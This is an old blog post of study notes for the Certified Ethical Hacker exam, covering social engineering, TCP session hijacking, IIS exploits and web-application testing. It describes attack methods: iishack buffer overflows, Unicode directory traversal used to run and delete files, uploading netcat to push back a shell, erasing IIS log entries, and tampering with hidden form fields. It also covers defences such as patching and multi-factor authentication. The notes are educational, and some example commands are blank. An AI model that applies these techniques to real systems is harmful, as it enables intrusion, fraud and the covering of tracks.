Friday, February 19, 2010

Certified Ethical Hacker 5

Social Engineering is the human interaction portion of hacking, which is usually 50% of the actual attack. This affects all levels of security in a company. Employees may unknowingly give away crucial information over the phone or at a common hang out.
Social Engineering is the Art of Manipulation. It is the use of another employee's credentials against a network. These credentials are given out in feeling of trust or belief. The goal of a good social engineer is to eliminate stress an employee has in giving out information. Hackers prey on human weaknesses.

Human Weakness is the weakest link in security. To successfully defend the network, employees need to be educated. Hardware and Software cannot defend against Social Engineering.

Social engineering can be both personal and technical. Personal is using regular human interaction to obtain necessary information. Technical is using the computer to retrieve the information such as through email phishing.

Impersonation is a big part of Social Engineering. Impersonation is a third-person approach. You can impersonate key personnel such as technical support, or technical directors. A good social engineer is a good listener.

You can also do shoulder surfing at hang out spots to nab passwords, or dumpster diving at wherever the company disposes of their waste.

Technical Social Engineering include email attachments or chat sessions. You can also employ cross-site scripting.

Reverse Social Engineering is to impersonate someone important then try to get the victim to share classified information with them. The approach is to try to ask for help from the person. While helping you, the person may divulge information about the network. The three parts of reverse social engineering are:
1) Sabotage
2) Advertising
3) Assisting

You should have good policies implemented about social engineering in the company. These policies should be enforced among all staff. Ways to deter a social engineer is to implement two or more methods of authentication:
-Something you know - Password
-Something you have - Smartcard
-Something you are - Biometrics

Session hijacking is the understanding of the flow of packets over the network and dissecting each vendor's implementation of TCP. To be effective in session hijacking, we must know the security issues and the basic attack methods of IPv4. We should know what's involved in the communication between two entities.

Spoofing is to impersonate. Hijacking on the other hand, takes over an existing session rather than creating a fake identity. Hijacking requires that a legitimately authenticated victim. During hijacking, we infiltrate a session, then kill the victim's connection.

Steps in Session Hijacking are:
1) Monitor and track the session
2) Desynchronize the connection
3) Insert your attack into that session stream

Session Hijacking typically allows only one or two commands into the session, so we should use scripting to help us.

There are two types of hijacking. An active attack is where an attacker takes over a session. A passive hijack is when a hijacker finds a session, but just monitors and records the information for later use (also known as sniffing).

Sequence numbers increase throughout a TCP session. Sequence numbers are 32-bit. The ACK from a receiver has the number of the sequence he is READY to receive. Session hijacking programs include:
-Juggernaut (Linux)
-TTY Watcher
-Hunt (Linux)
-IP Watcher

T-Sight can very easily take over Telnet sessions. You can do both passive and active session hijacking. You can view an active session real-time passively, or take over a session to do a more active hijack. The victim of the hijack will see "Connection to host lost" when he is hijacked.

A web server is just a service which listens to HTTP requests. Web servers include Apache and IIS. However, these web servers have known vulnerabilities. These vulnerabilities allow hackers to get more information from the web server than the administrator intends to. The file structure of an Apache server can be enumerated using long URLs. ISAPI buffer overflow of IIS is frequently exploited.

A common tool used against IIS4 is iishack.exe which is able to do a buffer overflow attack. iishack can be used with the following syntax:
iishack 80 is the victim's web server, 80 is its listening port. is the hacker's web server and trojan.exe is a script waiting to be uploaded.

Internet Print Protocol is vulnerable to buffer overflows. The vulnerability was back in Windows 2000. IISLockdown and URLscan utilities can help. If it's not used, disable the service. Also frequently install service packs and hotfixes.

ISAPI.dll can be exploited through netcat. Netcat allows to retrieve the actual source codes of applications.

IIS Directory Traversal is a vulnerability worked by confusing the parser of a URL. You can execute basic DOS commands by using malformed URLs filled with hexadecimal equivalents of characters. For example:\

This translates to running "dir C:\". You can also do almost any DOS commands. For example, you can delete files:\important.doc

This attack is also known as the Unicode Attack.

A number of tools can automatically do directory traversal. An example is IISxploit.exe. Unicodeuploader.pl allows to upload files into any web-server. cmdasp.asp allows to upload netcat (nc.exe) to the web server which can push a shell back to the PC. After uploading netcat, we can use hk.exe to get escalated privileges. This is patched on IIS 5.0.

ISPC.exe allows to connect malware to the ISAPI DLL. Once the malware is in place, the attacker can run ISPC.exe to get a remote shell.

Unspecified Executable Path Vulnerability occurs when executables and DLL files are not preceded by a path in the registry. WIndows 2000 will search for the file in this order:
1) Directory where the application is loaded
2) Directory of the parent process
3) System32 directory
4) System directory
5) Windows directory
6) Directories specified in the PATH environment variable

You can remove specific entries in IIS logs using CleanIISLog. A hacker can specify rules like "remove entries containing a certain IP address" and it would do it automatically. Very useful for attackers to cover their tracks.

To counter File System Traversal, give the least privileges to cmd.exe. Then remove executable permission to IUSR account. Apply the latest service packs and hotfixes.

UpdateExpert is a program that makes sure that a Windows system is up to date with patches.

cacls.exe is a built-in Windows 2000 utility that can set ACL permissions globally. Syntax to change permission on all executable files to allow full access to the System and the Administrators is as follows:
cacls.exe *.exe /T /G System:F Administrators:F

Stealth HTTP Scanner (N-Stealth) can scan over 18000 HTTP security issues. The results are shown in a HTML report. N-Stealth is often used for pen-test.

Vulnerabilities common to Web Applications
-Who's the real client?
-Special characters detection and correction
-HTML output character filtering
-Authorization of web applications
-Scripted authentication
-User authentications

Web application penetration methodologies
- Reconnaissance
We have do document the application and website. We do fingerprinting (platform detection). We find out how the platform handles errors. Then we enumerate the file/application structure.

Instant Source from BlazingTool allows to view client-side script source from the browser. Lynx is a text browser that will download files and links on each HTML page at the web site recursively (similar to WGet). BlackWidow from SoftByteLabs is similar to a crawler which will show the entire structure of a site. WebSleuth is also a crawler which can make use of a proxy.

Hidden form fields are typically used to move data across pages. Developers assume that people will not go around changing it. Hackers tend to manipulate the hidden form fields. For example, if a form field is used to store the price of a purchase, it can be modified so the hacker pays less.

We can create a proxy to manipulate the data sent between the client and the server. Such an example of a proxy is Burp Proxy. Burp Proxy allows interception of packets on the fly and allows the user to modify them on the spot.

WINHLP32.exe had a buffer-overflow exploit which could execute malicious code with the privilege levels of the logged-in user.

SQL Injection can come in many forms. We can first test by putting a single quotation mark ' and submitting the form. Try to use all symbols that would cause an error. Once the crash occurs, we would be able to find out what the back-end database is running.

Tokens are considered a false sense of security as the session could still be taken over after authentication is complete.

No comments :

Post a Comment